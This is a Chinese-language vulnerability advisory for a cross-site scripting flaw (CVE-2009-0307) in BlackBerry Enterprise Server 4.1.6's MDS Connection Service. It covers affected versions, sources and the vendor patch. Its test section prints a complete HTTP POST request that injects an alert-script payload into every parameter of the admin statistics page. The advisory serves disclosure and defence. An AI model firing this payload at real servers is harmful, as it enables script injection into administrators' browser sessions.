BlackBerry Enterprise Server MDS Connection Service跨站脚本漏洞漏洞

发布日期：2009-04-16
更新日期：2009-04-20

受影响系统：

RIM Blackberry Enterprise Server 4.1.6

不受影响系统：

RIM Blackberry Enterprise Server 4.1.6 MR5

描述：

---

BUGTRAQ  ID: 34573
CVE(CAN) ID: CVE-2009-0307

BlackBerry Enterprise Server软件是BlackBerry企业解决方案中的一个组件，能够在无线设备、企业应用程序和无线网络之间起到中间连接的作用。

BlackBerry Enterprise Server所使用MDS Connection Service的/admin/statistics/ConfigureStatistics脚本没有正确地验证多个参数输入，远程攻击者可以通过向该脚本提交恶意请求执行跨站脚本攻击，导致在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：Ken Millar
        Michael Thumann （mthumann@ernw.de）
  
  链接：http://secunia.com/advisories/34740/
        http://marc.info/?l=bugtraq&m=123998188810763&w=2
        http://www.blackberry.com/btsc/microsites/search.do?cmd=displayKC&externalId=KB17969
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

建议：

---

厂商补丁：

RIM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.blackberry.com/go/serverdownloads